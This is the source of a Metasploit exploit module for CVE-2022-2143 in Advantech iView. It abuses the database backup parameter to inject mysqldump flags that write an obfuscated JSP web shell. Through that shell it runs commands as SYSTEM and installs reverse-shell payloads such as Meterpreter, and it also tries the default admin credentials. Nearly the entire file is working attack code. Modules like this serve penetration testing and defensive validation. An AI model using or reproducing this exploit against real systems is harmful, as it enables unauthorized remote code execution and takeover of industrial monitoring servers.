Advantech iView NetworkServlet Command Injection

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Advantech iView NetworkServlet Command Injection',
        'Description' => %q{
          Versions of Advantech iView software below `5.7.04.6469` are
          vulnerable to an unauthenticated command injection vulnerability
          via the `NetworkServlet` endpoint.
          The database backup functionality passes a user-controlled parameter,
          `backup_file` to the `mysqldump` command. The sanitization functionality only
          tests for SQL injection attempts and directory traversal, so leveraging the
          `-r` and `-w` `mysqldump` flags permits exploitation.
          The command injection vulnerability is used to write a payload on the target
          and achieve remote code execution as NT AUTHORITY\SYSTEM.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'rgod', # Vulnerability discovery
          'y4er', # PoC
          'Shelby Pace' # Metasploit module
        ],
        'References' => [
          [ 'URL', 'https://y4er.com/post/cve-2022-2143-advantech-iview-networkservlet-command-inject-rce/'],
          [ 'CVE', '2022-2143']
        ],
        'Platform' => [ 'win' ],
        'Privileged' => true,
        'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],
        'Targets' => [
          [
            'Windows Dropper',
            {
              'Arch' => [ ARCH_X86, ARCH_X64 ],
              'Type' => :win_dropper,
              'CmdStagerFlavor' => [ 'psh_invokewebrequest', 'vbs' ],
              'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' }
            }
          ],
          [
            'Windows Command',
            {
              'Arch' => ARCH_CMD,
              'Type' => :win_cmd,
              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' }
            }
          ]
        ],
        'DisclosureDate' => '2022-06-28',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'Reliability' => [ REPEATABLE_SESSION ],
          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]
        }
      )
    )

    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('TARGETURI', [ true, 'The base path to Advantech iView', '/iView3']),
        OptString.new('USERNAME', [ false, 'The user name to authenticate with', 'admin']),
        OptString.new('PASSWORD', [ false, 'The password to authenticate with', 'password'])
      ]
    )
  end

  def check
    res = send_request_cgi!(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path)
    )

    return CheckCode::Unknown('Failed to receive a response from the application') unless res

    unless res.body.include?('iView')
      return CheckCode::Safe('No confirmation that target is Advantech iView')
    end

    res = send_db_backup_request('')
    return CheckCode::Detected('Failed to receive response from backup request') unless res

    # The patch added auth as a requirement for
    # accessing the NetworkServlet endpoint
    if res.body =~ /ERROR:\s+User\s+Not\sLogin/
      @needs_auth = true
      print_status('Vulnerability is present, though authentication is required.')
    end

    CheckCode::Appears
  end

  def send_db_backup_request(filename)
    send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'NetworkServlet'),
      'keep_cookies' => true,
      'vars_post' =>
      {
        'page_action_type' => 'backupDatabase',
        'backup_filename' => filename
      }
    )
  end

  def format_jsp
    bin_nums = []
    arg_nums = []
    flag_nums = []

    bin_param.each_char { |c| bin_nums << c.ord }
    bin_nums = bin_nums.join(',')
    arg_param.each_char { |c| arg_nums << c.ord }
    arg_nums = arg_nums.join(',')
    flag_param.each_char { |c| flag_nums << c.ord }
    flag_nums = flag_nums.join(',')

    '<%=new String(com.sun.org.apache.xml.internal.security.utils.JavaUtils.getBytesFromStream((' \
    'new ProcessBuilder(request.getParameter(' \
    "new java.lang.String(new byte[]{#{bin_nums}}))," \
    "request.getParameter(new java.lang.String(new byte[]{#{flag_nums}}))," \
    "request.getParameter(new java.lang.String(new byte[]{#{arg_nums}}))).start())" \
    '.getInputStream()))%>'
  end

  def flag_param
    @flag_param ||= Rex::Text.rand_text_alpha(3..8)
  end

  def arg_param
    @arg_param ||= Rex::Text.rand_text_alpha(3..8)
  end

  def bin_param
    @bin_param ||= Rex::Text.rand_text_alpha(3..8)
  end

  def jsp_filename
    @jsp_filename ||= "#{Rex::Text.rand_text_alpha(5..12)}.jsp"
  end

  def execute_command(cmd, _opts = {})
    send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, jsp_filename),
      'keep_cookies' => true,
      'vars_get' =>
      {
        bin_param => 'cmd.exe',
        flag_param => '/c',
        arg_param => cmd
      }
    )
  end

  def iview_authenticate
    res = send_request_cgi!(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path)
    )

    fail_with(Failure::UnexpectedReply, 'Login page not found') unless res && res.body.include?('loginWindow')
    vprint_good('Successfully accessed the login page')

    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'CommandServlet'),
      'keep_cookies' => true,
      'vars_post' => {
        'page_action_service' => 'UserServlet',
        'page_action_type' => 'login',
        'user_name' => datastore['USERNAME'],
        'user_password' => datastore['PASSWORD'],
        'use_ldap' => 'false',
        'data' => ''
      }
    )

    unless res && res.body.include?('Success')
      fail_with(Failure::BadConfig, 'Authentication failed. Credentials likely incorrect.')
    end
    vprint_good('Authentication successful!')
  end

  def need_auth?
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'NetworkServlet')
    )
    return false unless res

    !!(res.body =~ /ERROR:\s+User\s+Not\sLogin/)
  end

  def exploit
    if @needs_auth || need_auth?
      iview_authenticate
    end

    jsp_code = format_jsp

    sql_filename = "#{Rex::Text.rand_text_alpha(5..12)}.sql"
    full_cmd = "#{sql_filename}\" -r \"./webapps/iView3/#{jsp_filename}\" -w \"#{jsp_code}\""

    res = send_db_backup_request(full_cmd)
    fail_with(Failure::UnexpectedReply, 'Failed to write JSP file to target') unless res

    path = "webapps\\iView3\\#{jsp_filename}"
    register_file_for_cleanup(path)
    if target['Type'] == :win_dropper
      execute_cmdstager
    else
      execute_command(payload.encoded)
    end
  end
end